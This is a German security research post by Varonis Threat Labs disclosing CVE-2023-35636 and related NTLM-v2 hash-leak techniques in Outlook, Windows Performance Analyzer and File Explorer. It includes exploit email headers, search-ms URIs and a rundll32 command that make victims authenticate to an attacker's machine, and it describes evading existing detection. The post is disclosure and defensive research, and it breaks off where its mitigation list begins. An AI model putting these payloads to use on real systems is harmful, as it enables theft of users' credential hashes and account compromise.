Varonis Threat Labs hat eine neue Outlook-Schwachstelle (CVE-2023-35636) entdeckt, eine von drei neuen Möglichkeiten um per Exploit von Outlook, Windows Performance Analyzer (WPA) und Windows File Explorer auf NTLM-v2-Hash-Passwörter zuzugreifen. Mit Zugriff auf diese Passwörter können Angreifer einen Offline-Brute-Force-Angriff oder einen Authentifizierungs-Relay-Angriff versuchen, um ein Konto zu kompromittieren und Zugriff darauf zu erhalten.
Varonis Threat Labs hat es sich zur Aufgabe gemacht, neue Möglichkeiten aufzudecken, wie Daten kompromittiert werden können. Dadurch können wir bessere Sicherheitslösungen entwickeln, die Bedrohungen erkennen und abwehren. Wir haben diese Schwachstellen und Exploits im Juli 2023 an Microsoft gemeldet. Microsoft hat die Schwachstellen für WPA und Windows File Explorer inzwischen als „mäßig schwer“ und den Exploit CVE-2023-35636 für Outlook als „wichtig“ eingestuft, mit einer Bewertung von 6.5. Microsoft hat am 12. Dezember 2023 einen Patch für dieses CVE veröffentlicht.
Ungepatchte Systeme bleiben für Bedrohungsakteure anfällig, die versuchen, gehashte Passwörter mithilfe der folgenden Methoden zu stehlen.
CVE-2023-35636 ist ein Exploit der Kalenderfreigabefunktion in Microsoft Outlook. Hierbei wird eine E-Mail mit zwei Headern versandt, wodurch Outlook angewiesen wird, Inhalte zu teilen und einen bestimmten Computer zu kontaktieren. Dadurch kann ein NTLM-v2-Hash abgefangen werden.
NTLM v2 ist ein kryptografisches Protokoll, das von Microsoft Windows zur Authentifizierung von Benutzern auf Remote-Servern verwendet wird. NTLM v2 ist zwar eine sicherere Version des ursprünglichen NTLM, aber v2 ist immer noch anfällig für Offline-Brute-Force- und Authentifizierungs-Relay-Angriffe.
Ein Teil des NTLM-v2-Protokolls umfasst den sicheren Transport von Passwörtern als Hashes. Beim Passwort-Hashing wird ein Passwort (oder ein beliebiges anderes Datenelement) mithilfe eines Verschlüsselungsalgorithmus in eine kurze Folge aus Buchstaben und/oder Zahlen umgewandelt.
Da kein Salting (Hinzufügen eines zufälligen Werts zum Passwort, um vorberechnete Hash-Tabellen zu verhindern) stattfindet, sind sie passwortäquivalent – Bedrohungsakteure können sich damit also authentifizieren, ohne das tatsächliche Passwort zu kennen, falls sie den Hash-Wert vom Server abrufen können.
Ein Beispiel für einen abgefangenen NTLM-v2-Hash.
Angreifer verwenden in der Regel NTLM-v2-Hashes in zwei Arten von Angriffen: Offline-Brute-Force-Angriffe oder ein Authentifizierungs-Relay.
Ein Offline Brute-Force-Angriff ist ein Angriff, bei dem der Angreifer Zugriff auf eine Kopie des NTLM-v2-Hash des Benutzerpassworts hat. Er kann dann einen Computer verwenden, um alle möglichen Passwörter zu generieren und sie nacheinander mit dem Hash abzugleichen, bis er einen Treffer findet.
Da das Brute-Forcing des Passworts nur auf dem Rechner des Angreifers durchgeführt wird, hinterlässt der Angriffsversuch keine Spuren im Netzwerk und ist somit nicht erkennbar. Diese Technik ist so weit verbreitet, dass es sogar ein kostenloses Webtool, ntlm.pw, gibt, mit dem das tatsächliche Passwort abgerufen werden kann, wenn es gefunden wird. Das verdeutlicht nochmals, welche Gefahren dieser Hash und leicht zu knackende Passwörter bergen.
Ein Authentifizierungs-Relay-Angriff ist eine Art von Angriff, bei der der Bedrohungsakteur eine NTLM-v2-Authentifizierungsanfrage abfängt und an einen anderen Server weiterleitet.
Der Computer des Opfers sendet dann die Authentifizierungsantwort an den Server des Angreifers. Dieser kann die Informationen verwenden, um sich auf dem Server zu authentifizieren, das das Opfer kontaktieren wollte.
Outlook ist das Standard-E-Mail- und Kalendertool für die Microsoft-365-Suite und wird von Millionen Menschen auf der ganzen Welt sowohl für geschäftliche als auch für private Zwecke verwendet.
Eine der Funktionen von Outlook ist die Möglichkeit, Kalender zwischen Benutzern zu teilen. Wie Varonis Threat Labs herausgefunden hat, kann diese Funktion jedoch ausgenutzt werden, indem mehrere Header in einer E-Mail versandt werden. Dadurch wird ein Authentifizierungsversuch ausgelöst, bei dem das gehashte Passwort weitergeleitet wird.
Um diesen Exploit erfolgreich auszuführen, müssen einer E-Mail zwei E-Mail-Header hinzugefügt werden:
Exploit-Header:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
URI-Handler, auch bekannt als URI-Schemata oder Protokoll-Handler, sind der Teil eines Betriebssystems, mit dem Anwendungen sich als Softwareprotokoll oder spezifisches Tool registrieren können, das für bestimmte Typen von Uniform Resource Identifiers (URIs) verwenden werden soll.
URI-Handler ermöglichen eine nahtlose Integration zwischen verschiedenen Anwendungen, so dass Sie mit einem einfachen Klick auf einen Link Webseiten öffnen, E-Mail-Clients starten, Anrufe initiieren oder andere benutzerdefinierte Aktionen durchführen können. Gängige Beispiele sind etwa „http://“ oder „mailto://“.
Der Windows Performance Analyzer (WPA) ist ein umfassendes und funktionsreiches Tool, das im Windows Performance Toolkit und im Software Development Kit enthalten ist.
Da diese Funktion standardmäßig integriert ist, wird sie letztendlich auf den Computern vieler Entwickler verwendet. WPA installiert, wie viele andere Programme auch, standardmäßig einen URI-Handler für „WPA://“, damit das Programm automatisch gestartet wird, wenn ein Benutzer auf einen WPA-Link klickt.
Das Interessante daran: WPA versucht, sich mithilfe von NTLM v2 über das offene Web zu authentifizieren.
Normalerweise sollte NTLM v2 verwendet werden, wenn versucht wird, sich bei internen IP-adressbasierten Diensten zu authentifizieren. Wenn der NTLM-v2-Hash jedoch über das offene Internet übertragen wird, ist er anfällig für Relay- und Offline-Brute-Force-Angriffe.
Der gesamte Payload ist simpel und besteht aus nur drei Teilen.
WPA-Angriffe wirken vielleicht wie eine einfache Möglichkeit für Bedrohungsakteure, sich Zugang zu verschaffen, aber die meisten Benutzer sind keine Entwickler und haben wahrscheinlich kein WPA installiert.
Wir bei Varonis Threat Labs haben weiter nachgeforscht und festgestellt, dass wir denselben Angriff mit dem Prozess explorer.exe des Windows-Dateimanagers durchführen können. Hinweis: Mit explorer.exe ist nur der Prozess selbst gemeint, nicht das Produkt.
Mit Explorer.exe können Sie Ihre Dateien und Ordner durchsuchen, Dateien kopieren und verschieben sowie Ordner erstellen und löschen. Explorer.exe enthält außerdem eine leistungsstarke Suchfunktion, mit der Sie Dateien schnell und einfach finden können.
Um explorer.exe auf das Web zu verweisen, gibt es das URI-Handle „search-ms“, das die Suche von explorer.exe aktiviert. Damit können bei Bedarf auch erweiterte Suchparameter festgelegt werden.
Wir haben in der Dokumentation von Microsoft zwei einzigartige Parameter gefunden, deren Verhalten und erwartete Werte weniger bekannt sind: die Parameter „subquery“ und „crumb“.
Die erste Methode, um NTLM-v2-Hashes zu exfiltrieren, ist der Parameter subquery:
search-ms://query=poc&subquery=\\(Gerät des Angreifers)\poc.search-ms
Wenn der Computer des Opfers versucht, eine Verbindung zum Computer des Angreifers herzustellen, um die Datei abzurufen, wird der NTLM-v2-Hash an diesen Angreifer gesendet.
Diese Methode führt dazu, dass Runndll32 mit dem folgenden Parameter geöffnet wird:
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie <Domain des Angreifers> http:// <Domain des Angreifers>/poc.search-ms
Das gleiche Muster wie „DavSetCookie“ in den Protokollen.
Diese Methode führt zu den gleichen Kompromittierungsindikatoren wie CVE-2023-23397 – und wird teilweise durch die gleichen Erkennungsmechanismen erfasst – mit derselben DavSetCookie-Funktion.
Die zweite Methode, die wir gefunden haben, um NTLM-Hashes herauszuschmuggeln, ist die Verwendung des crumb-Parameters:
search-ms://query=poc&crumb=location:\\(Gerät des Angreifers)
Dieser Exploit verwendet dasselbe Angriffsszenario wie der andere Exploit des Windows-Explorers.
Der crumb-Parameter kann einen spezifischen Ort verwenden, den explorer.exe als Suchbasis verwenden soll, also als Ausgangspunkt für die Suchabfrage. Diese Funktion ermöglicht es einem Angreifer, den Computer des Opfers anzuweisen, sich mit dem Computer des Angreifers zu verbinden und sich dort zu authentifizieren. Dadurch hat er die Möglichkeit, das Hash-Passwort zu stehlen.
Anders als beim subquery-Parameter gibt es in diesem Fall keine rundll32-Instanz – die gesamte Kommunikation erfolgt direkt von explorer.exe. Dadurch werden also tatsächlich alle vorherigen Erkennungsmechanismen für CVE-2023-23397 umgangen.
Microsoft hat den Exploit CVE-2023-35636 für Outlook als „wichtig“ gekennzeichnet, mit der Bewertung 6.5. Am 12. Dezember 2023 wurde ein Patch für CVE-2023-35636 veröffentlicht.
Varonis hat Microsoft am 5. Juli 2023 über das Microsoft Security Response Center über die WPA-Sicherheitslücke und am 30. Juli 2023 über die Windows-Explorer-Sicherheitslücke informiert. Microsoft hat beide Tickets wegen „mäßigen Schweregrads“ geschlossen.
Ungepatchte Systeme bleiben für Bedrohungsakteure anfällig, die versuchen, gehashte Passwörter mithilfe der folgenden Methoden zu stehlen.
Es gibt mehrere Möglichkeiten, sich vor NTLM-v2-Angriffen zu schützen: